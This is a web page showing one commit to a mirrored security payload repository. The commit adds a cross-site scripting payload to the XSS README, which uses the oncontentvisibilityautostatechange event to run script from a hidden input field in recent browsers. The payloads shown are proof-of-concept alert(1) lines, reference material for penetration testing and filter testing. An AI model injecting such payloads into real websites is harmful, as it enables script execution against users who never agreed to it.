ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #746 from TRKBKR/master

Browse Source 
Added oncontentvisibilityautostatechange to XSS in hidden input
This commit is contained in:
Swissky 2024-11-02 11:44:08 +01:00 committed by GitHub
commit eb4795047b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
XSS Injection/README.md
View File

@ -295,6 +295,10 @@ e.g: 14.rs/#alert(document.domain)
<input type="hidden" accesskey="X" onclick="alert(1)"> <input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event Use CTRL+SHIFT+X to trigger the onclick event
``` ```
in newer browsers : firefox-130/chrome-108
```javascript
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto" >
```
### XSS when payload is reflected capitalized ### XSS when payload is reflected capitalized